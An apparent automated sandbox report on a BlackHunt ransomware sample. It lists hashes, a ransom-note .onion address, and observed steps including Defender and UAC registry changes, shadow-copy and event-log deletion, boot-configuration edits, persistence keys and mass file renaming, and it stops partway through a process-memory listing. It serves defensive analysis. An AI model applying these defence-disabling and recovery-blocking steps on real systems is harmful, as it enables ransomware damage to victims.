Analysis
-
max time kernel
91s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
18/01/2024, 23:45
Static task
static1
Behavioral task
behavioral1
Sample
730dff0a623a60c6814d8d909f0db94ed912e681b14e6dd11c55643ec9643995.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
730dff0a623a60c6814d8d909f0db94ed912e681b14e6dd11c55643ec9643995.exe
Resource
win10v2004-20231215-en
General
-
Target
730dff0a623a60c6814d8d909f0db94ed912e681b14e6dd11c55643ec9643995.exe
-
Size
707KB
-
MD5
a3bbd021de690483b74d17802f4bb118
-
SHA1
5dba486efbde42277aed5d2401b88e3ddd4b52bd
-
SHA256
730dff0a623a60c6814d8d909f0db94ed912e681b14e6dd11c55643ec9643995
-
SHA512
63105a48556eede38298f916ed3286cd399394263689398caf44e4365634c1144df488e365fc191797130d1dcac30a09050c9f4ebe8965385491d05388c4b175
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1q8Rvnh:6uaTmkZJ+naie5OTamgEoKxLWRFh
Malware Config
Extracted
F:\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 2 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 7016 fsutil.exe 23188 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 730dff0a623a60c6814d8d909f0db94ed912e681b14e6dd11c55643ec9643995.exe -
Clears Windows event logs 1 TTPs 5 IoCs
pid Process 23300 wevtutil.exe 23284 wevtutil.exe 23296 wevtutil.exe 23268 wevtutil.exe 23100 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
pid Process 8056 bcdedit.exe 6832 bcdedit.exe 23212 bcdedit.exe 19956 bcdedit.exe -
Renames multiple (3357) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 6152 wbadmin.exe 19968 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation 730dff0a623a60c6814d8d909f0db94ed912e681b14e6dd11c55643ec9643995.exe Key value queried \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation cmd.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 730dff0a623a60c6814d8d909f0db94ed912e681b14e6dd11c55643ec9643995.exe -
Enumerates connected drives 3 TTPs 27 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\R: 730dff0a623a60c6814d8d909f0db94ed912e681b14e6dd11c55643ec9643995.exe File opened (read-only) \??\E: 730dff0a623a60c6814d8d909f0db94ed912e681b14e6dd11c55643ec9643995.exe File opened (read-only) \??\P: 730dff0a623a60c6814d8d909f0db94ed912e681b14e6dd11c55643ec9643995.exe File opened (read-only) \??\A: 730dff0a623a60c6814d8d909f0db94ed912e681b14e6dd11c55643ec9643995.exe File opened (read-only) \??\W: 730dff0a623a60c6814d8d909f0db94ed912e681b14e6dd11c55643ec9643995.exe File opened (read-only) \??\Y: 730dff0a623a60c6814d8d909f0db94ed912e681b14e6dd11c55643ec9643995.exe File opened (read-only) \??\U: 730dff0a623a60c6814d8d909f0db94ed912e681b14e6dd11c55643ec9643995.exe File opened (read-only) \??\K: 730dff0a623a60c6814d8d909f0db94ed912e681b14e6dd11c55643ec9643995.exe File opened (read-only) \??\Z: 730dff0a623a60c6814d8d909f0db94ed912e681b14e6dd11c55643ec9643995.exe File opened (read-only) \??\B: 730dff0a623a60c6814d8d909f0db94ed912e681b14e6dd11c55643ec9643995.exe File opened (read-only) \??\M: 730dff0a623a60c6814d8d909f0db94ed912e681b14e6dd11c55643ec9643995.exe File opened (read-only) \??\T: 730dff0a623a60c6814d8d909f0db94ed912e681b14e6dd11c55643ec9643995.exe File opened (read-only) \??\H: 730dff0a623a60c6814d8d909f0db94ed912e681b14e6dd11c55643ec9643995.exe File opened (read-only) \??\J: 730dff0a623a60c6814d8d909f0db94ed912e681b14e6dd11c55643ec9643995.exe File opened (read-only) \??\L: 730dff0a623a60c6814d8d909f0db94ed912e681b14e6dd11c55643ec9643995.exe File opened (read-only) \??\Q: 730dff0a623a60c6814d8d909f0db94ed912e681b14e6dd11c55643ec9643995.exe File opened (read-only) \??\X: 730dff0a623a60c6814d8d909f0db94ed912e681b14e6dd11c55643ec9643995.exe File opened (read-only) \??\M: fsutil.exe File opened (read-only) \??\S: 730dff0a623a60c6814d8d909f0db94ed912e681b14e6dd11c55643ec9643995.exe File opened (read-only) \??\G: 730dff0a623a60c6814d8d909f0db94ed912e681b14e6dd11c55643ec9643995.exe File opened (read-only) \??\N: 730dff0a623a60c6814d8d909f0db94ed912e681b14e6dd11c55643ec9643995.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\I: 730dff0a623a60c6814d8d909f0db94ed912e681b14e6dd11c55643ec9643995.exe File opened (read-only) \??\O: 730dff0a623a60c6814d8d909f0db94ed912e681b14e6dd11c55643ec9643995.exe File opened (read-only) \??\V: 730dff0a623a60c6814d8d909f0db94ed912e681b14e6dd11c55643ec9643995.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\F: fsutil.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 3 ip-api.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\#BlackHunt_BG.jpg" 730dff0a623a60c6814d8d909f0db94ed912e681b14e6dd11c55643ec9643995.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\ja-jp\#BlackHunt_Private.key 730dff0a623a60c6814d8d909f0db94ed912e681b14e6dd11c55643ec9643995.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\fr-ma\ui-strings.js 730dff0a623a60c6814d8d909f0db94ed912e681b14e6dd11c55643ec9643995.exe File created C:\Program Files\VideoLAN\VLC\#BlackHunt_Private.key 730dff0a623a60c6814d8d909f0db94ed912e681b14e6dd11c55643ec9643995.exe File created C:\Program Files\VideoLAN\VLC\locale\es\#BlackHunt_ReadMe.txt 730dff0a623a60c6814d8d909f0db94ed912e681b14e6dd11c55643ec9643995.exe File created C:\Program Files\VideoLAN\VLC\locale\fa\#BlackHunt_ReadMe.hta 730dff0a623a60c6814d8d909f0db94ed912e681b14e6dd11c55643ec9643995.exe File created C:\Program Files\VideoLAN\VLC\plugins\demux\#BlackHunt_Private.key 730dff0a623a60c6814d8d909f0db94ed912e681b14e6dd11c55643ec9643995.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Appstore\Download_on_the_App_Store_Badge_en_135x40.svg 730dff0a623a60c6814d8d909f0db94ed912e681b14e6dd11c55643ec9643995.exe File created C:\Program Files\dotnet\shared\#BlackHunt_Private.key 730dff0a623a60c6814d8d909f0db94ed912e681b14e6dd11c55643ec9643995.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\sv-se\#BlackHunt_Private.key 730dff0a623a60c6814d8d909f0db94ed912e681b14e6dd11c55643ec9643995.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\es-es\#BlackHunt_ReadMe.txt 730dff0a623a60c6814d8d909f0db94ed912e681b14e6dd11c55643ec9643995.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\root\ui-strings.js 730dff0a623a60c6814d8d909f0db94ed912e681b14e6dd11c55643ec9643995.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files-select\css\main.css 730dff0a623a60c6814d8d909f0db94ed912e681b14e6dd11c55643ec9643995.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\AddressBook.png 730dff0a623a60c6814d8d909f0db94ed912e681b14e6dd11c55643ec9643995.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\fr-fr\#BlackHunt_Private.key 730dff0a623a60c6814d8d909f0db94ed912e681b14e6dd11c55643ec9643995.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\de-de\ui-strings.js 730dff0a623a60c6814d8d909f0db94ed912e681b14e6dd11c55643ec9643995.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\da-dk\#BlackHunt_ReadMe.txt 730dff0a623a60c6814d8d909f0db94ed912e681b14e6dd11c55643ec9643995.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\tr-tr\#BlackHunt_ReadMe.txt 730dff0a623a60c6814d8d909f0db94ed912e681b14e6dd11c55643ec9643995.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\fi-fi\AppStore_icon.svg 730dff0a623a60c6814d8d909f0db94ed912e681b14e6dd11c55643ec9643995.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\plugins\#BlackHunt_Private.key 730dff0a623a60c6814d8d909f0db94ed912e681b14e6dd11c55643ec9643995.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\#BlackHunt_ReadMe.hta 730dff0a623a60c6814d8d909f0db94ed912e681b14e6dd11c55643ec9643995.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\adobe_sign_tag.png 730dff0a623a60c6814d8d909f0db94ed912e681b14e6dd11c55643ec9643995.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\hu-hu\ui-strings.js 730dff0a623a60c6814d8d909f0db94ed912e681b14e6dd11c55643ec9643995.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\it-it\#BlackHunt_Private.key 730dff0a623a60c6814d8d909f0db94ed912e681b14e6dd11c55643ec9643995.exe File created C:\Program Files\VideoLAN\VLC\locale\sl\#BlackHunt_ReadMe.hta 730dff0a623a60c6814d8d909f0db94ed912e681b14e6dd11c55643ec9643995.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_folder-disabled_32.svg 730dff0a623a60c6814d8d909f0db94ed912e681b14e6dd11c55643ec9643995.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\cs-cz\ui-strings.js 730dff0a623a60c6814d8d909f0db94ed912e681b14e6dd11c55643ec9643995.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\uk-ua\#BlackHunt_ReadMe.txt 730dff0a623a60c6814d8d909f0db94ed912e681b14e6dd11c55643ec9643995.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\themes\dark\new_icons_retina.png 730dff0a623a60c6814d8d909f0db94ed912e681b14e6dd11c55643ec9643995.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\images\new_icons_retina.png 730dff0a623a60c6814d8d909f0db94ed912e681b14e6dd11c55643ec9643995.exe File created C:\Program Files\VideoLAN\VLC\locale\ach\#BlackHunt_ReadMe.hta 730dff0a623a60c6814d8d909f0db94ed912e681b14e6dd11c55643ec9643995.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\da-dk\#BlackHunt_Private.key 730dff0a623a60c6814d8d909f0db94ed912e681b14e6dd11c55643ec9643995.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\de-de\ui-strings.js 730dff0a623a60c6814d8d909f0db94ed912e681b14e6dd11c55643ec9643995.exe File created C:\Program Files\VideoLAN\VLC\locale\hi\#BlackHunt_ReadMe.hta 730dff0a623a60c6814d8d909f0db94ed912e681b14e6dd11c55643ec9643995.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\fr-fr\#BlackHunt_Private.key 730dff0a623a60c6814d8d909f0db94ed912e681b14e6dd11c55643ec9643995.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\themes\dark\line.cur 730dff0a623a60c6814d8d909f0db94ed912e681b14e6dd11c55643ec9643995.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\plugins\rhp\pages-app-selector.js 730dff0a623a60c6814d8d909f0db94ed912e681b14e6dd11c55643ec9643995.exe File opened for modification C:\Program Files\7-Zip\Lang\it.txt 730dff0a623a60c6814d8d909f0db94ed912e681b14e6dd11c55643ec9643995.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\ar-ae\#BlackHunt_ReadMe.hta 730dff0a623a60c6814d8d909f0db94ed912e681b14e6dd11c55643ec9643995.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\images\progress.gif 730dff0a623a60c6814d8d909f0db94ed912e681b14e6dd11c55643ec9643995.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\sv-se\ui-strings.js 730dff0a623a60c6814d8d909f0db94ed912e681b14e6dd11c55643ec9643995.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\images\Other-48.png 730dff0a623a60c6814d8d909f0db94ed912e681b14e6dd11c55643ec9643995.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\ru-ru\#BlackHunt_ReadMe.txt 730dff0a623a60c6814d8d909f0db94ed912e681b14e6dd11c55643ec9643995.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\#BlackHunt_Private.key 730dff0a623a60c6814d8d909f0db94ed912e681b14e6dd11c55643ec9643995.exe File created C:\Program Files\VideoLAN\VLC\locale\oc\#BlackHunt_ReadMe.txt 730dff0a623a60c6814d8d909f0db94ed912e681b14e6dd11c55643ec9643995.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\#BlackHunt_Private.key 730dff0a623a60c6814d8d909f0db94ed912e681b14e6dd11c55643ec9643995.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\themes\dark\logo_retina.png 730dff0a623a60c6814d8d909f0db94ed912e681b14e6dd11c55643ec9643995.exe File created C:\Program Files\VideoLAN\VLC\plugins\spu\#BlackHunt_ReadMe.hta 730dff0a623a60c6814d8d909f0db94ed912e681b14e6dd11c55643ec9643995.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\fi-fi\#BlackHunt_Private.key 730dff0a623a60c6814d8d909f0db94ed912e681b14e6dd11c55643ec9643995.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\sl-si\ui-strings.js 730dff0a623a60c6814d8d909f0db94ed912e681b14e6dd11c55643ec9643995.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\en-gb\#BlackHunt_Private.key 730dff0a623a60c6814d8d909f0db94ed912e681b14e6dd11c55643ec9643995.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\tr-tr\#BlackHunt_ReadMe.hta 730dff0a623a60c6814d8d909f0db94ed912e681b14e6dd11c55643ec9643995.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\cs-cz\#BlackHunt_ReadMe.txt 730dff0a623a60c6814d8d909f0db94ed912e681b14e6dd11c55643ec9643995.exe File opened for modification C:\Program Files\7-Zip\Lang\ast.txt 730dff0a623a60c6814d8d909f0db94ed912e681b14e6dd11c55643ec9643995.exe File opened for modification C:\Program Files\Java\jre-1.8\legal\jdk\zlib.md 730dff0a623a60c6814d8d909f0db94ed912e681b14e6dd11c55643ec9643995.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\ca-es\ui-strings.js 730dff0a623a60c6814d8d909f0db94ed912e681b14e6dd11c55643ec9643995.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\es-es\#BlackHunt_ReadMe.txt 730dff0a623a60c6814d8d909f0db94ed912e681b14e6dd11c55643ec9643995.exe File opened for modification C:\Program Files\7-Zip\Lang\af.txt 730dff0a623a60c6814d8d909f0db94ed912e681b14e6dd11c55643ec9643995.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\#BlackHunt_ReadMe.txt 730dff0a623a60c6814d8d909f0db94ed912e681b14e6dd11c55643ec9643995.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\cs-cz\#BlackHunt_ReadMe.hta 730dff0a623a60c6814d8d909f0db94ed912e681b14e6dd11c55643ec9643995.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\images\themes\dark\#BlackHunt_ReadMe.hta 730dff0a623a60c6814d8d909f0db94ed912e681b14e6dd11c55643ec9643995.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\sl-si\#BlackHunt_Private.key 730dff0a623a60c6814d8d909f0db94ed912e681b14e6dd11c55643ec9643995.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\jdk\libpng.md 730dff0a623a60c6814d8d909f0db94ed912e681b14e6dd11c55643ec9643995.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\cs-cz\ui-strings.js 730dff0a623a60c6814d8d909f0db94ed912e681b14e6dd11c55643ec9643995.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\sl-si\#BlackHunt_ReadMe.txt 730dff0a623a60c6814d8d909f0db94ed912e681b14e6dd11c55643ec9643995.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 6932 22864 WerFault.exe 292 -
Checks SCSI registry key(s) 3 TTPs 4 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName vds.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4044 schtasks.exe -
Interacts with shadow copies 2 TTPs 6 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 1160 vssadmin.exe 3884 vssadmin.exe 1172 vssadmin.exe 4016 vssadmin.exe 7908 vssadmin.exe 23248 vssadmin.exe -
Kills process with taskkill 1 IoCs
pid Process 23312 taskkill.exe -
Modifies registry class 11 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" cmd.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings cmd.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon cmd.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon cmd.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2 cmd.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 23352 PING.EXE -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 3384 730dff0a623a60c6814d8d909f0db94ed912e681b14e6dd11c55643ec9643995.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 3384 730dff0a623a60c6814d8d909f0db94ed912e681b14e6dd11c55643ec9643995.exe Token: SeRestorePrivilege 3384 730dff0a623a60c6814d8d909f0db94ed912e681b14e6dd11c55643ec9643995.exe Token: SeBackupPrivilege 3384 730dff0a623a60c6814d8d909f0db94ed912e681b14e6dd11c55643ec9643995.exe Token: SeTakeOwnershipPrivilege 3384 730dff0a623a60c6814d8d909f0db94ed912e681b14e6dd11c55643ec9643995.exe Token: SeAuditPrivilege 3384 730dff0a623a60c6814d8d909f0db94ed912e681b14e6dd11c55643ec9643995.exe Token: SeSecurityPrivilege 3384 730dff0a623a60c6814d8d909f0db94ed912e681b14e6dd11c55643ec9643995.exe Token: SeIncBasePriorityPrivilege 3384 730dff0a623a60c6814d8d909f0db94ed912e681b14e6dd11c55643ec9643995.exe Token: SeBackupPrivilege 3068 vssvc.exe Token: SeRestorePrivilege 3068 vssvc.exe Token: SeAuditPrivilege 3068 vssvc.exe Token: SeBackupPrivilege 11508 wbengine.exe Token: SeRestorePrivilege 11508 wbengine.exe Token: SeSecurityPrivilege 11508 wbengine.exe Token: SeSecurityPrivilege 23300 wevtutil.exe Token: SeBackupPrivilege 23300 wevtutil.exe Token: SeSecurityPrivilege 23284 wevtutil.exe Token: SeBackupPrivilege 23284 wevtutil.exe Token: SeSecurityPrivilege 23296 wevtutil.exe Token: SeBackupPrivilege 23296 wevtutil.exe Token: SeSecurityPrivilege 23268 wevtutil.exe Token: SeBackupPrivilege 23268 wevtutil.exe Token: SeSecurityPrivilege 23100 wevtutil.exe Token: SeBackupPrivilege 23100 wevtutil.exe Token: SeDebugPrivilege 23312 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3384 wrote to memory of 208 3384 730dff0a623a60c6814d8d909f0db94ed912e681b14e6dd11c55643ec9643995.exe 90 PID 3384 wrote to memory of 208 3384 730dff0a623a60c6814d8d909f0db94ed912e681b14e6dd11c55643ec9643995.exe 90 PID 3384 wrote to memory of 4420 3384 730dff0a623a60c6814d8d909f0db94ed912e681b14e6dd11c55643ec9643995.exe 91 PID 3384 wrote to memory of 4420 3384 730dff0a623a60c6814d8d909f0db94ed912e681b14e6dd11c55643ec9643995.exe 91 PID 3384 wrote to memory of 2680 3384 730dff0a623a60c6814d8d909f0db94ed912e681b14e6dd11c55643ec9643995.exe 172 PID 3384 wrote to memory of 2680 3384 730dff0a623a60c6814d8d909f0db94ed912e681b14e6dd11c55643ec9643995.exe 172 PID 3384 wrote to memory of 3804 3384 730dff0a623a60c6814d8d909f0db94ed912e681b14e6dd11c55643ec9643995.exe 96 PID 3384 wrote to memory of 3804 3384 730dff0a623a60c6814d8d909f0db94ed912e681b14e6dd11c55643ec9643995.exe 96 PID 3384 wrote to memory of 1012 3384 730dff0a623a60c6814d8d909f0db94ed912e681b14e6dd11c55643ec9643995.exe 98 PID 3384 wrote to memory of 1012 3384 730dff0a623a60c6814d8d909f0db94ed912e681b14e6dd11c55643ec9643995.exe 98 PID 208 wrote to memory of 1648 208 cmd.exe 100 PID 208 wrote to memory of 1648 208 cmd.exe 100 PID 4420 wrote to memory of 4560 4420 cmd.exe 163 PID 4420 wrote to memory of 4560 4420 cmd.exe 163 PID 2680 wrote to memory of 4256 2680 reg.exe 102 PID 2680 wrote to memory of 4256 2680 reg.exe 102 PID 3384 wrote to memory of 4616 3384 730dff0a623a60c6814d8d909f0db94ed912e681b14e6dd11c55643ec9643995.exe 103 PID 3384 wrote to memory of 4616 3384 730dff0a623a60c6814d8d909f0db94ed912e681b14e6dd11c55643ec9643995.exe 103 PID 3804 wrote to memory of 3524 3804 cmd.exe 105 PID 3804 wrote to memory of 3524 3804 cmd.exe 105 PID 3384 wrote to memory of 3888 3384 730dff0a623a60c6814d8d909f0db94ed912e681b14e6dd11c55643ec9643995.exe 106 PID 3384 wrote to memory of 3888 3384 730dff0a623a60c6814d8d909f0db94ed912e681b14e6dd11c55643ec9643995.exe 106 PID 3384 wrote to memory of 3372 3384 730dff0a623a60c6814d8d909f0db94ed912e681b14e6dd11c55643ec9643995.exe 108 PID 3384 wrote to memory of 3372 3384 730dff0a623a60c6814d8d909f0db94ed912e681b14e6dd11c55643ec9643995.exe 108 PID 3384 wrote to memory of 3200 3384 730dff0a623a60c6814d8d909f0db94ed912e681b14e6dd11c55643ec9643995.exe 109 PID 3384 wrote to memory of 3200 3384 730dff0a623a60c6814d8d909f0db94ed912e681b14e6dd11c55643ec9643995.exe 109 PID 3384 wrote to memory of 4512 3384 730dff0a623a60c6814d8d909f0db94ed912e681b14e6dd11c55643ec9643995.exe 111 PID 3384 wrote to memory of 4512 3384 730dff0a623a60c6814d8d909f0db94ed912e681b14e6dd11c55643ec9643995.exe 111 PID 1012 wrote to memory of 2788 1012 cmd.exe 114 PID 1012 wrote to memory of 2788 1012 cmd.exe 114 PID 3384 wrote to memory of 4636 3384 730dff0a623a60c6814d8d909f0db94ed912e681b14e6dd11c55643ec9643995.exe 115 PID 3384 wrote to memory of 4636 3384 730dff0a623a60c6814d8d909f0db94ed912e681b14e6dd11c55643ec9643995.exe 115 PID 4616 wrote to memory of 4132 4616 cmd.exe 118 PID 4616 wrote to memory of 4132 4616 cmd.exe 118 PID 3384 wrote to memory of 5008 3384 730dff0a623a60c6814d8d909f0db94ed912e681b14e6dd11c55643ec9643995.exe 117 PID 3384 wrote to memory of 5008 3384 730dff0a623a60c6814d8d909f0db94ed912e681b14e6dd11c55643ec9643995.exe 117 PID 3384 wrote to memory of 1660 3384 730dff0a623a60c6814d8d909f0db94ed912e681b14e6dd11c55643ec9643995.exe 119 PID 3384 wrote to memory of 1660 3384 